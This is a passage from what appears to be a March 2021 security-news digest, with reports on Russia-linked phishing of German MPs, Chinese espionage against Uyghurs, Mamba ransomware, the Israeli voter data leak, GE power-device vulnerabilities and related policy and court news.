And finally, the draft order would create a cybersecurity incident-response board, which would have a mission of information-sharing. The board would bring together federal representatives and cybersecurity researchers to host a forum for vendors; and, it would offer both incentives and liability protections to encourage participation, according to Reuters.
The NSC spokeswoman said that the EO could be released as quickly as next week, but that final decisions on what exactly will go into it have yet to be made.
German Parliament Bundestag targeted again by Russia-linked hackers
27.3.2021 BigBrothers Securityaffairs
Several members of the German Parliament (Bundestag) and other members of the state parliament were hit by a targeted attack allegedly launched by Russia-linked hackers.
German newspaper Der Spiegel revealed that email accounts of multiple members of the German Parliament (Bundestag) were targeted with a spearphishing attack.
The messages were sent by threat actors to the private emails of the German politicians. The attackers are suspected to be hackers of the tracked as Ghostwriter group that works under the control of the Russian military secret service GRU.
“The Bundestag has again become the target of alleged Russian hackers. According to SPIEGEL information, the computers of at least seven members of the Bundestag were attacked.” states the report published by Der Spiegel. “The attack by the group called “ghostwriters” is said to have been carried out via so-called phishing emails to the private email addresses of politicians, ie messages from supposedly trustworthy senders whose aim is to hijack the entire account.”
At this time is not clear if the attackers were able to steal sensitive data during the intrusion.
Seven members of the German federal parliament (Bundestag) and 31 members of German regional parliaments were hit by the attack, most of them are part of the CDU/CSU and SPD parties.
Frank Bergmann, a spokesman for the Bundestag, told The Record that the attack did not impact the infrastructure of the German Bundestag. Once the attack was uncovered, the German authorities notified the impacted politicians.
Der Spiegel also reported that the threat actors, according to government circles, also targeted political activists in Hamburg and Bremen.
In August, researchers from FireEye reported that GhostWriter group was behind a disinformation campaign that started at least in March 2017 and is aligned with Russian security interests.
Unlike other disinformation campaigns, GhostWriter doesn’t spread through social networks, instead, threat actors behind this campaign abused compromised content management systems (CMS) of news websites or spoofed email accounts to disseminate fake news.
The attackers used to replace existing legitimate articles on the sites with the fake content, instead of creating new posts.
The attackers were spreading fabricated content, including falsified news articles, quotes, correspondence, and other documents designed to appear as coming from military officials and political figures in the target countries.
According to the experts, the campaign primarily targeted audiences in specific states members of the alliance, including Lithuania, Latvia, and Poland.
Ghostwriter operators focused on spreading fabricated quotes, such as a quote falsely attributed to the commander of the NATO eFP Battle Group that was used to push a narrative that 21 Canadian soldiers stationed in Latvia had been infected with COVID-19.
In October 2020, the Council of the European Union announced sanctions imposed on Russian military intelligence officers, belonging to the 85th Main Centre for Special Services (GTsSS), for their role in the 2015 attack on the German Federal Parliament (Deutscher Bundestag). The 85th Main Centre for Special Services (GTsSS) is the military unit of the Russian government also tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM).
'Russian Hackers' Again Target German MPs: Report
27.3.2021 BigBrothers Securityweek
Several German lawmakers have once again fallen victim to a cyber attack, local media said Friday, with security experts pointing the finger at Russian hackers.
Hackers used phishing emails to gain access to the computers of at least seven federal MPs and 31 lawmakers in regional parliaments, according to Der Spiegel weekly.
A spokesman for the lower house of parliament confirmed the cyber attack but said there was "currently no indication" of a direct attack on the IT infrastructure of the German Bundestag.
Security experts suspect Russia's GRU military intelligence service of being behind the hacking, Der Spiegel said, through the "Ghostwriter" group which reportedly specialises in spreading disinformation.
It remains unclear if any sensitive information was accessed, the magazine added.
Most of the lawmakers targeted come from Germany's ruling coalition parties, the CDU/CSU conservative bloc and the centre-left Social Democrats, Spiegel said.
Several political activists were also affected, Spiegel added.
German Chancellor Angela Merkel last year said she had concrete proof that Russia was targeting her in cyber attacks.
The most high-profile incident blamed on Russian hackers to date was a cyber attack in 2015 that completely paralysed the computer network of the Bundestag, forcing the entire parliament offline for days while it was fixed.
German prosecutors last month filed espionage charges against a German man suspected of having passed the floorplans of parliament to Russian secret services in 2017.
Foreign Minister Heiko Maas last week said Germany was expecting to be the target of Russian disinformation in the run-up to its general election in September, calling it "completely unacceptable". Russia denies being behind such activities.
Report: US Gov Executive Order to Mandate Data Breach Disclosure
27.3.2021 BigBrothers Securityweek
A proposed executive order would set new rules on the disclosure of data breaches that also affect United States government agencies, according to a Reuters news report.
The report said the executive order, which could be released as soon as the next week, would require software vendors to notify U.S. government customers of cyber-security breaches that also affect them.
Furthermore, the order is expected to force federal agencies to improve their security posture through the adoption of multi-factor authentication and data encryption within their environments.
When it comes to programs deemed critical, vendors might be forced to provide a “software bill of materials,” detailing program components and offering increased visibility into resources that could introduce additional vulnerabilities.
Per the order, software vendors would be asked to work together with specialized government agencies, such as the FBI and CISA, when investigating cyber-incidents.
Likely a reaction to the recent SolarWinds attacks, the order is expected to impact the interaction between major software vendors and government agencies.
More than one hundreds organizations, including multiple federal agencies, have been confirmed to be affected by the SolarWinds hack, but the overall number of victims could be greater.
What’s more, the SolarWinds attack is only one of the many cyber-incidents involving private companies that also has a major impact on government agencies. A December 2020 cyber-attack was linked to an assault on FireEye, which tests the defenses of thousands of customers, including federal, state and local governments.
In September 2020, Tyler Technologies, which provides software and services for state and local governments, disclosed a ransomware incident. However, the company said that software hosted for its clients was not affected.
General Says Attacks by Foreign Hackers Are 'Clarion Call'
27.3.2021 BigBrothers Securityweek
The U.S. Cyber Command conducted more than two dozen operations aimed at thwarting interference in last November’s presidential election, the general who leads the Pentagon’s cyber force said Thursday.
Gen. Paul Nakasone did not describe the nature of the operations in testimony to the Senate Armed Services Committee but said they were designed “to get ahead of foreign threats before they interfered with or influenced our elections in 2020.”
A U.S. intelligence assessment released last week said that neither Russia nor any other nation manipulated votes or conducted cyberattacks that affected the outcome of the vote.
Nakasone’s appearance before the committee came as the U.S. deals with major cyber intrusions, including a breach by elite Russian hackers that exploited supply chain vulnerabilities to break into the networks of federal government agencies and private companies.
Nakasone said in his prepared remarks that Cyber Command and the National Security Agency are helping plan the Biden administration’s response to the SolarWinds intrusion and that “policymakers are considering a range of options, including costs that might be imposed by other elements of our government.”
Separately, the U.S. is working with the private sector to respond to a separate hack that exposed tens of thousands of servers running Microsoft’s Exchange email program to intrusion.
Asked by the committee chairman, Sen. Jack Reed, D-R.I., whether the intrusions represented a “new terrain,” Nakasone said both the SolarWinds and Microsoft hacks revealed “a scope, a scale, a level of sophistication that we hadn’t seen previously.”
“It is the clarion call for us to look at this differently — how do we ensure we have as a nation both the resiliency and the ability to act against these type of adversaries,” he said.
Nakasone said one challenge is that foreign state hackers have taken advantage of legal constraints that prevent U.S. intelligence agencies such as the NSA, whose surveillance is focused abroad, from monitoring domestic infrastructure for cyber threats. Hackers are increasingly using U.S.-based virtual private networks, or VPNs, to evade detection by the U.S. government.
As a result, he said, the problem is not that intelligence agencies can’t connect all the dots but rather “we can’t see all of the dots.”
“We have an inability to see everything,” he added. “We as U.S. Cyber Command or the National Security Agency may see what is occurring outside of the United States, but when it comes into the United States, our adversaries are moving very quickly. They understand the laws and the policies that we have within our nation, and so they’re utilizing our own infrastructure, our own internet service providers, to create these intrusions.”
A senior Biden administration official told reporters earlier this month that the administration was not currently seeking additional authorities to monitor U.S.-based networks. Rather, the U.S. is working to encourage better information-sharing from the private sector about cyber threats.
Private companies are typically reluctant to share information on hacks and attempted hacks with the FBI and other government agencies, mostly out of fear of the negative business fallout if it were to become public. In many cases, companies don’t even report the incidents to the government.
On Wednesday, Sen. Mark Warner, D-Va., lamented in a webinar about being unable to get support in Congress for legislation to make it mandatory for companies to disclose cyber breaches. The chairman of the Senate Intelligence Committee singled out the telecommunications sector — a big target in the SolarWinds hack — as being especially resistant.
Facebook Disrupts Spy Effort Aimed at Uyghurs
26.3.2021 BigBrothers Threatpost
The social-media giant took down legions of fake profiles aimed at spreading espionage malware.
Facebook has taken on a group of hackers in China that target the Uyghur ethnic group with cyberespionage activity.
The hacking group, known as Earth Empusa or Evil Eye, was targeting activists, dissidents and journalists involved in the Uyghur community, primarily those living abroad in Australia, Canada, Kazakhstan, Syria, Turkey and the United States, among other countries, by using fake Facebook accounts for fictitious people sympathetic to the Uyghur community. Facebook said Wednesday that the group was sending malicious links in Facebook messages that, if clicked, led to espionage-focused malware infections.
The malicious links led to look-alike domains for popular Uyghur and Turkish news sites, according to Facebook, as well as to compromised legitimate websites.
“Some of these webpages contained malicious JavaScript code that resembled previously reported exploits, which installed iOS malware known as Insomnia on people’s devices once they were compromised,” said Mike Dvilyanski, head of cyber-espionage investigations and Nathaniel Gleicher, head of security policy, writing in a joint Facebook posting.
This was all undertaken with selective targeting, according to the post: “This group took steps to conceal their activity and protect malicious tools by only infecting people with iOS malware when they passed certain technical checks, including IP address, operating system, browser, and country and language settings.”
Android Malware Attacks
Facebook took down the fake profiles, but it also found websites set up by the group that mimic third-party Android app stores, where they published Uyghur-themed applications. These included a keyboard app, a prayer app and a dictionary app, according to the posting, which were trojanized with two Android malware strains — ActionSpy or PluginPhantom.
The Uyghurs, a Turkic minority ethnic group affiliated with Central and East Asia, have previously been targeted in other mobile spyware attacks, including by an ActionSpy campaign seen as recently as June.
Analysis on the latest Android malware found that Beijing Best United Technology Co. and Dalian 9Rush Technology Co. are the developers behind some of the tooling deployed by Earth Empusa, according to Facebook.
“These China-based firms are likely part of a sprawling network of vendors, with varying degrees of operational security,” the two wrote, adding that FireEye lend threat intelligence insight that informed Facebook’s assessment.
“FireEye uncovered an operation targeting the Uyghur community and other Chinese speakers through malicious mobile applications that were designed to collect extensive personal information from victims including GPS location, SMS, contacts lists, screenshots, audio and keystrokes,” said Ben Read, director of analysis at Mandiant Threat Intelligence, via email. “This operation has been active since at least 2019 and is designed for long term persistence on victim phones, enabling the operators to gather vast amounts of personal data.”
He added that FireEye believes the activity is state-sponsored. “On several occasions, the Chinese cyber espionage actors have leveraged mobile malware to target Uyghurs, Tibetans, Hong Kong democracy activists and others believed to be threats to the stability of the regime,” he said.
FBI published a flash alert on Mamba Ransomware attacks
26.3.2021 BigBrothers Securityaffairs
The Federal Bureau of Investigation (FBI) issued an alert to warn that the Mamba ransomware is abusing the DiskCryptor open source tool to encrypt entire drives.
The Federal Bureau of Investigation (FBI) published an alert to warn that the Mamba ransomware is abusing the DiskCryptor open-source tool (aka HDDCryptor, HDD Cryptor) to encrypt entire drives.
Mamba ransomware is one of the first malware that encrypted hard drives rather than files that was detected in public attacks. Mamba leverages a disk-level encryption strategy instead of the conventional file-based one.
The first sample of Mamba Ransomware discovered in the wild was using the full disk encryption tool DiskCryptor to strongly encrypt the data. DiskCryptor allows users to encrypt all disk drives, including the system partition, it is an alternative to Microsoft’s BitLocker.
Mamba was first spotted on September 2016 when experts at Morphus Labs discovered the infection of machines belonging to an energy company in Brazil with subsidiaries in the United States and India.
The researchers shared a detailed analysis on Security Affairs, they explained that once the malware has infected a Windows machine, it overwrites the existing Master Boot Record, with a custom MBR and encrypts the hard drive using the DiskCryptor tool.
According to the flash alert published by the FBI, the Mamba ransomware was employed in attacks against local governments, public transportation agencies, legal services, technology services, industrial, commercial, manufacturing, and construction businesses
“Mamba ransomware weaponizes DiskCryptor—an open source full disk encryption software— to restrict victim access by encrypting an entire drive, including the operating system. DiskCryptor is not inherently malicious but has been weaponized.” reads the alert published by the FBI. “Once encrypted, the system displays a ransom note including the actor’s email address, ransomware file name, the host system name, and a place to enter the decryption key.”
The ransomware is simple, it is composed of the opensource, off-the-shelf, disk encryption software DiskCryptor wrapped in a program that installs and executes the disk encryption in the background using a key provided by the attacker before restarting the machine. Once the encryption process is completed the system is restarted again and the malicious code displays the ransom note to the victim.
The ransom note includes information such as host system name, the threat actor’s email address, the ransomware file name, and indications on where to enter the decryption key. Furthermore, victims are told to contact the attackers by email to receive information on how they can pay a ransom to receive the decryption key.
“The attacker passes the encryption key via the command-line parameter: [Ransomware Filename].exe . The ransomware extracts a set of files and installs an encryption service. The ransomware program restarts the system about two minutes after installation of DiskCryptor to complete driver installation.” continues the alert.
The malware saves the encryption key and the shutdown time variable is a configuration file named myConf.txt, which is readable until the second system restart, about two hours later which concludes the encryption and displays the ransom note on the infected system.
According to the alert, when one of the DiskCryptor files are detected, in order to attempt to recover the files without paying the ransom, it is possible to determine if the myConf.txt is still accessible and then recover the password. This opportunity is limited to the point in which the system reboots for the second time.
The alert provides a list of mitigations to stay protected from ransomware families:
Recommended Mitigations
• Regularly back up data, air gap, and password protect backup copies offline. Ensure copies of
critical data are not accessible for modification or deletion from the system where the data
resides.
• Implement network segmentation.
• Require administrator credentials to install software.
• If DiskCryptor is not used by the organization, add the key artifact files used by DiskCryptor to
the organization’s execution blacklist. Any attempts to install or run this encryption program
and its associated files should be prevented.
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary
data and servers in a physically separate, segmented, secure location (i.e., hard drive, storage
device, the cloud).
• Install updates/patch operating systems, software, and firmware as soon as they are
released.
• Use multifactor authentication where possible.
• Regularly, change passwords to network systems and accounts, and avoid reusing passwords
for different accounts. Implement the shortest acceptable timeframe for password changes.
• Disable unused remote access/RDP ports and monitor remote access/RDP logs.
• Audit user accounts with administrative privileges and configure access controls with least
privilege in mind.
• Install and regularly update anti-virus and anti-malware software on all hosts.
• Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using
a VPN.
“The FBI does not encourage paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities,” the FBI concludes.
US Cyber Experts Conducted Operations to Safeguard Election
26.3.2021 BigBrothers Securityweek
The U.S. Cyber Command conducted more than two dozen operations aimed at preventing interference in last November’s presidential election, the general who leads the Pentagon’s cyber force said Thursday.
Gen. Paul Nakasone, in prepared remarks to the Senate Armed Services Committee, did not describe those operations, so it was not immediately clear whether these were efforts strictly at defending the United States against intrusions or offensive measures to shut down intruders. He said his command’s operations were designed “to get ahead of foreign threats before they interfered with or influenced our elections in 2020.”
A U.S. intelligence assessment released last week said that neither Russia nor any other nation manipulated votes or conducted cyberattacks that affected the outcome of the vote.
Nakasone’s appearance before the committee comes as the U.S. is grappling with major cyber intrusions, including a breach by Russian hackers that exploited supply chain vulnerabilities to access federal government agencies and private companies.
Nakasone said Cyber Command and the National Security Agency are helping plan the Biden administration’s response to the SolarWinds intrusion and that “policymakers are considering a range of options, including costs that might be imposed by other elements of our government.”
Separately, the U.S. is responding to a breach that affected thousands users of Microsoft’s email server software.
Chinese Hackers Used Facebook to Hack Uighur Muslims Living Abroad
26.3.2021 BigBrothers Thehackernews
Facebook may be banned in China, but the company on Wednesday said it has disrupted a network of bad actors using its platform to target the Uyghur community and lure them into downloading malicious software that would allow surveillance of their devices.
"They targeted activists, journalists and dissidents predominantly among Uyghurs from Xinjiang in China primarily living abroad in Turkey, Kazakhstan, the United States, Syria, Australia, Canada and other countries," Facebook's Head of Cyber Espionage Investigations, Mike Dvilyanski, and Head of Security Policy, Nathaniel Gleicher, said. "This group used various cyber espionage tactics to identify its targets and infect their devices with malware to enable surveillance."
The social media giant said the "well-resourced and persistent operation" aligned with a threat actor known as Evil Eye (or Earth Empusa), a China-based collective known for its history of espionage attacks against the Muslim minority in the nation at least since August 2019 via "strategically compromised websites" by exploiting iOS and Android devices as attack surface to gain access to Gmail accounts.
The disclosures come days after the European Union, U.K., U.S., and Canada jointly announced sanctions against several senior officials in China over human rights abuses against Uyghurs in the Chinese province of Xinjiang.
Evil Eye is said to have resorted to a multifaceted approach to stay under and conceal its malicious intent by posing as journalists, students, human rights advocates, or members of the Uyghur community to build trust with targeted victims before drawing them into clicking on malicious links.
Besides social engineering efforts, the collective leveraged a network of malware-infested websites, both legitimately compromised websites and lookalike domains for popular Uyghur and Turkish news sites, that were used as a watering hole to attract and selectively infect iPhone users based on certain technical criteria, including IP address, operating system, browser, country, and language settings.
"Some of these web pages contained malicious javascript code that resembled previously reported exploits, which installed iOS malware known as INSOMNIA on people's devices once they were compromised," the company noted. Insomnia comes with capabilities to exfiltrate data from a variety of iOS apps, such as contacts, location, and iMessage, as well as third-party messaging clients from Signal, WhatsApp, Telegram, Gmail, and Hangouts.
Separately, Evil Eye also set up lookalike third-party Android app stores to publish trojanized Uyghur-themed applications such as a keyboard app, prayer app, and dictionary app, which served as a conduit to deploy two Android malware strains ActionSpy and PluginPhantom. Further investigation into the Android malware families linked the attack infrastructure to two Chinese companies Beijing Best United Technology Co., Ltd. (Best Lh) and Dalian 9Rush Technology Co., Ltd. (9Rush).
"These China-based firms are likely part of a sprawling network of vendors, with varying degrees of operational security," the researchers noted.
In a series of countermeasures, the company said it blocked the malicious domains in question from being shared on its platform, disabled the offending accounts, and notified about 500 people who were targeted by the adversary.
This is not the first time Facebook has outed technology firms that operate as a front for state-sponsored hacking activities. In December 2020, the social network formally linked OceanLotus to an information technology company called CyberOne Group located in Vietnam.
A day before elections, hackers leaked details of millions of Israeli voters
25.3.2021 BigBrothers Securityaffairs
Hackers have exposed personal and voter registration details of over 6.5 million Israeli voters, less than 24 hours before the election.
A few hours before the election in Israel, hackers exposed the voter registration and personal details of millions of citizens. The source of the data seems to be the app Elector developed by the software firm Elector Software for the Israeli political party Likud.
Exposed data include residential addresses, phone numbers, and dates of birth of the registered voters, which appear to be from another data breach leak that took place a year ago. Anyway, the media reported that at least one file includes people’s full names and their assigned voting stations, which appear to be updated to the current voting round.
“The data was exposed after hackers made threats last week against Elector Software Ltd., the operators of the voter-prompting Elector App, which is used by the ruling Likud party and several others.” reported Calcalist. “The threats, some of which were sent directly to the company, included warnings that the attackers would leak data that was allegedly stolen from the app, as well as personal information on the company’s CEO Tzur Yemin, and his family unless the app ceases operating. “This is an extortion attempt and I have filed a complaint to the police,” Tzur told Calcalist.”
The hackers initially shared links to download the data they claim to have stolen. The files were encrypted, while the threat actors was threatening to distribute the password unless use of the Elector app was discontinued.
“The passwords will be distributed in the coming days if they choose to continue lying,” the attackers wrote. “You don’t have long left until information about your family is exposed too.”
Early this week, the hackers released the password via websites that don’t require registration allowing anyone to access them. The attackers, identified as “The Israeli Autumn,” declared they were “forced” to release the information due to the failure of authorities to deal with Elector.
Exposed files included names and ballot numbers of all 6,528,565 eligible voters and the personal details of over 3 Million Israeli citizens (full names, phone numbers, ID card numbers, home addresses, gender, age, and political preferences).
In February, a misconfiguration in an election day app developed by the Netanyahu’s party Likud have exposed personal details of over 6.5 million Israelis. The incident was reported by Verizon Media developer Ran Bar-Zik, and several Israeli media ([1], [2], [3], [4]) confirmed the data leak.
Bar-Zik discovered the huge trove of data while was performing a security audit of the Elector app.
“Netanyahu is actually sending Likud activists into a serious security breach, one of the most serious that has been exposed in recent years in Israel.” reads the post published by Calcalist. “Because a major security failure in Elector’s app and system revealed all the Likud’s voter data ahead of the upcoming elections: a huge database of voters and containing up-to-date personal information – ID, full name, address, and phone – of close to 6.5 million Israelis with voting rights.”
It is not clear if the leaked information was accessed also by unauthorized parties before it was discovered, but recent leak could confirm this circumstance.
The analysis of the source code of the app revealed the presence of a link to an API endpoint that used to authenticate the site’s administrators.
The expert pointed out that the API doesn’t require any authentication to be used to query the application are receive the site’s administrators’s data in cleartext, including their passwords.
Once obtained the credentials, Bar-Zik used them access to the site’s backend, including a database that contained the personal details of 6,453,254 Israeli citizens.
The database was an official and up to date copy of Israel’s voter registration database, which each managed by any party before the election.
Following the discovery of the data leak, the official website of the Elector app was took down
CISA is warning of vulnerabilities in GE Power Management Devices
24.3.2021 BigBrothers Securityaffairs
U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns of flaws in GE Power Management Devices that could allow an attacker to conduct multiple malicious activities on vulnerable systems.
U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns of vulnerabilities in GE Power Management Devices that could be exploited by an attacker to conduct multiple malicious activities on systems belonging to the Universal Relay (UR) family.
The flaws could be exploited to access sensitive information, reboot the device, trigger a denial-of-service condition, and gain privileged access.
The types of vulnerabilities affecting the devices are Inadequate Encryption Strength, Session Fixation, Exposure of Sensitive Information to an Unauthorized Actor, Improper Input Validation, Unrestricted Upload of File with Dangerous Type, Insecure Default Variable Initialization, Use of Hard-coded Credentials.
“Successful exploitation of these vulnerabilities could allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition.” reads the alert published by CISA.
GE’s UR devices are used to control and protect the power consumption of various devices. Affected UR families are B30, B90, C30, C60, C70, C95, D30, D60, F35, F60, G30, G60, L30, L60, L90, M60, N60, T35, T60. The vendor released security updates for all these devices and urges customers to update their installs, it also released mitigations to address the flaws.
“GE strongly recommends users with impacted firmware versions update their UR devices to UR firmware Version 8.10, or greater to resolve these vulnerabilities. GE provides additional mitigations and information about these vulnerabilities in GE Publication Number: GES-2021-004 (login required).” continues the alert.
The most severe issue addressed by the vendor is a critical “INSECURE DEFAULT VARIABLE INITIALIZATION” issue tracked as CVE-2021-27426 and rated with a CVSS score of 9.8 out of 10.
“UR IED with “Basic” security variant does not allow the disabling of the “Factory Mode,” which is used for servicing the IED by a “Factory” user.” reads the advisory for this flaw.
The vulnerability could be exploited by a remote attacker to bypass security restrictions.
“GE UR family could allow a remote attacker to bypass security restrictions, caused by insecure default variable initialization in UR IED. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions.” reads the advisory published by IBM X-Force.
Another high-severity issue addressed by the vendor is related to the “USE OF HARD-CODED CREDENTIALS tracked as CVE-2021-27430 that received a CVSS score of 8.4.
“UR bootloader binary Version 7.00, 7.01 and 7.02 included unused hardcoded credentials. Additionally, a user with physical access to the UR IED can interrupt the boot sequence by rebooting the UR.” continues the advisory.
GE also addressed a high-severity issue, an EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR, tracked as CVE-2021-27422 and rated with a CVSS v3 base score of 7.5.
“Web server interface is supported on UR over HTTP protocol. It allows sensitive information exposure without authentication.” continues the alert.
GE recommends the implementation of network defense-in-depth practices to protect UR IED, including placing UR IED inside the control system network security perimeter, and having access controls, monitoring (such as an Intrusion Detection System), and other mitigating technologies in place.
“CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.” states CISA. “Specifically, users should:
Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.”
CISA Warns of Security Flaws in GE Power Management Devices
23.3.2021 BigBrothers Threatpost
The flaws could allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition.
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning of critical-severity security flaws in GE’s Universal Relay (UR) family of power management devices.
GE’s UR devices are the “basis of simplified power management for the protection of critical assets,” according to the company. These are computing devices that allow users to control the amount of electrical power consumed by various device. The UR devices allow the underlying devices to switch into various power modes (each having various power usage characteristics). GE has issued patches for the following affected UR device families: B30, B90, C30, C60, C70, C95, D30, D60, F35, F60, G30, G60, L30, L60, L90, M60, N60, T35 and T60.
CISA warned that if not updated, the affected products could be exploited to allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition.
Given that the devices control the flow and direction of electrical power, the impact of these flaws is heightened: “GE strongly recommends users with impacted firmware versions update their UR devices to UR firmware Version 8.10, or greater to resolve these vulnerabilities,” according to CISA’s alert last week.
GE Security Flaws
Overall, nine vulnerabilities were patched across the affected devices. The most serious of the these (CVE-2021-27426) has a CVSS score of 9.8 out of 10, making it critical. The flaw stems from insecure default variable initialization. According to an IBM security alert, an affected GE UR family could allow a remote attacker to bypass security restrictions, stemming from insecure default variable initialization in the UR Intelligent Electronic Device (IED) component.
“By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions,” according to IBM. According to GE, the flaw is remotely exploitable and requires a “low skill level to exploit.”
Another high-severity issue (CVE-2021-27430) stems from the fact that the UR bootloader binary in versions 7.00, 7.01 and 7.02 includes hardcoded credentials. According to IBM, a local attacker could exploit this vulnerability to interrupt the boot sequence by rebooting the UR. The flaw ranks 8.4 on the CVSS scale, making it high-severity.
“Additionally, a user with physical access to the UR IED can interrupt the boot sequence by rebooting the UR,” said CISA.
Another high-severity issue (CVE-2021-27422) is that the web server interface for the affected devices are supported on UR over the HTTP protocol – allowing for sensitive information exposure without authentication, said researchers.
Finally, researchers found that a flaw in the web-based UR Setup configuration tool (CVE-2021-27428) of the affected UR families could allow a remote attacker to upload arbitrary files.
“By sending a specially-crafted request, a remote attacker could exploit this vulnerability to upgrade firmware without appropriate privileges,” according to an IBM advisory.
Security Updates: Patch Now
According to reports, the flaws were first found in July – and the UR firmware version addressing the flaws (version 8.10) was pushed out on Dec. 24. SCADA-X, DOE’s Cyber Testing for Resilient Industrial Control Systems (CyTRICS) program, Verve Industrial, and VuMetric reported these flaws to GE.
However, after public disclosure of the flaws last week CISA is now urging end users to update their UR devices. No known public exploits for the vulnerabilities have been discovered yet, noted CISA.
“GE recommends protecting UR IED by using network defense-in-depth practices,” according to CISA’s alert. “This includes, but is not limited to, placing UR IED inside the control system network security perimeter, and having access controls, monitoring (such as an Intrusion Detection System), and other mitigating technologies in place.”
GE has dealt with security issues before. In December, a pair ofcritical vulnerabilities were discovered in dozens of GE Healthcare radiological devices popular in hospitals, which could allow an attacker to gain access to sensitive personal health information (PHI), alter data and even shut the machine’s availability down.
Ministry of Defence academy hit by state-sponsored hackers
23.3.2021 BigBrothers Securityaffairs
The Ministry of Defence academy was hit by a major cyber attack, Russia and China state-sponsored hackers are suspected to be behind the offensive
The Ministry of Defence academy was hit by a major cyber attack, according to the British tabloid newspaper The Sun, Russia and China state-sponsored hackers are suspected to be behind the offensive.
The Defence Academy of the United Kingdom provides higher education for personnel in the British Armed Forces, Civil Service, other government departments and service personnel from other nations. The Defence Academy is headquartered at what used to be the Royal Military College of Science site at Shrivenham in southwestern Oxfordshire; it delivers education and training there and in a number of other sites. The majority of training is postgraduate with many courses being accredited for the award of civilian qualifications.
“THE MoD’s defence academy has been hit by a major cyber attack.” reported The Sun. “Staff were told the hack was by a foreign power, making Russia and China suspects.”
The cyber attack took offline the website of the academy and knocked out the IT network, which is run by a contractor. Systems at the academy was compromised and it will take time to completely restore the impacted computers and servers.
“They said it’s the work of a foreign power.” “Everyone was told to use their personal laptops and computers because the work ones have been compromised. a source told The Sun. “It is going to take at least five weeks to fix.”
Ministry of Defence confirmed that it is aware of an issue with the Defence Academy IT systems.
“These are run by a contractor and there is no impact on the Ministry of Defence IT network itself.” announced the Ministry of Defence. “Teaching continues.”
UK Unveils Plan for Smaller, More High-Tech Armed Forces
23.3.2021 BigBrothers Securityweek
Britain plans to cut the size of its army and boost spending on drones, robots and a new “cyber force” under defense plans announced by the government on Monday.
Defense Secretary Ben Wallace said the British Army would shrink from 76,500 soldiers to 72,500 by 2025. He said the army hadn’t been at its “established strength” of 82,500 for several years.
Wallace said the military would no longer be “overstretched and underequipped” and that new investment in equipment, infrastructure and technology “marks a shift from mass mobilization to information age speed, readiness and relevance for confronting the threats of the future.”
Wallace said the armed forces “will no longer be held as a force of last resort, but become more present and active around the world.”
Britain is the second-biggest military spender in NATO, after the United States. In November the government announced a 16.5 billion-pound ($23 billion) increase in defense spending over the next four years, focusing on the future battlefields of space and cyber rather than traditional resources such as army troops.
Prime Minister Boris Johnson said Monday that the reforms would give the military “the kit now that they will need to make themselves all the more useful, all the more, I’m afraid, lethal, and effective around the world.”
“Therefore, all the more valuable to our allies, and all the more deterring to our foes.”
Defense of Convicted Cypriot Hacker in US Not Seeking Appeal
23.3.2021 BigBrothers Securityweek
A lawyer for a Cypriot hacker who has served almost four years behind bars said he will not appeal against a one-year jail sentence in the US for cyber-crimes he committed as a minor.
A Georgia court handed down the jail term on Thursday in the trial of Joshua Pelloso Epifaniou, now 22, who was arrested in Cyprus in May 2017 and last year became the first Cypriot national ever extradited to the United States.
“This historic extradition and sentencing would not have been possible without the determination of our FBI investigators and the help of our federal and foreign partners,” Chris Hacker, an FBI Special Agent in Atlanta, Georgia, said in a Department of Justice statement.
"It is further proof that no matter where criminals who prey on US companies and citizens are hiding, either geographically or virtually, we will pursue them and bring them to justice,” Hacker said.
Cyprus-based lawyer Michael Chambers, in an email to AFP, said an appeal would not be filed although Epifaniou had confessed and was expecting to be freed on time served.
“I do not believe that the sentence is worth appealing against as he will be released in 10 months,” said Chambers.
The Cypriot’s legal team had hoped Epifaniou would be released as he had pleaded guilty and paid compensation.
Epifaniou pleaded guilty to federal computer fraud charges brought in Arizona and Georgia.
As a result of the conviction, Epifaniou forfeited $389,113 and €70,000 ($83,000) to the government and paid $600,000 in restitution to his fraud victims, on the back of his cryptocurrency takings.
Epifaniou was extradited last July 16 to face charges for crimes committed at night from his bedroom in his mother's Nicosia home as a teenager.
The maximum sentence for the charges he faced was 20 years.
Between October 2014 and May 2017, Epifaniou hacked websites and monitored online traffic to identify extortion targets.
After selecting target websites, he worked with co-conspirators to steal information from the websites’ databases.
Epifaniou then used proxy servers located in foreign countries to log into email accounts and send messages to the websites threatening to leak the sensitive data unless a ransom was paid in bitcoins, which have since shot up in value.
Initially arrested in Nicosia at the age of 17, he spent more than three years in a Cypriot jail without being convicted and fighting extradition.
His Filipina mother Vivina Polloso, a supermarket employee, has expressed heartbreak at his treatment, especially after he was whisked out of the country after a brief and tearful farewell at the island's international airport in the midst of the coronavirus crisis.
"They deprived him of his youth, he became an adult in prison," his mother said.
US Sentences Russian, North Macedonian in Cyber Fraud Case
23.3.2021 BigBrothers Securityweek
The United States sentenced a Russian and a North Macedonian on Friday to prison for their roles in a vast cyber crime operation.
Sergey Medvedev, 33, of Russia and Marko Leopard, 31, of North Macedonia, were sentenced to ten and five years respectively, according to a Justice Department statement.
Both had previously pleaded guilty to criminal conspiracy in federal court in Nevada.
Medvedev, arrested in Thailand in 2018, co-founded the "Infraud Organization," a marketplace for "counterfeit documents, stolen bank account and credit account information, and stolen personal identifying information," authorities said.
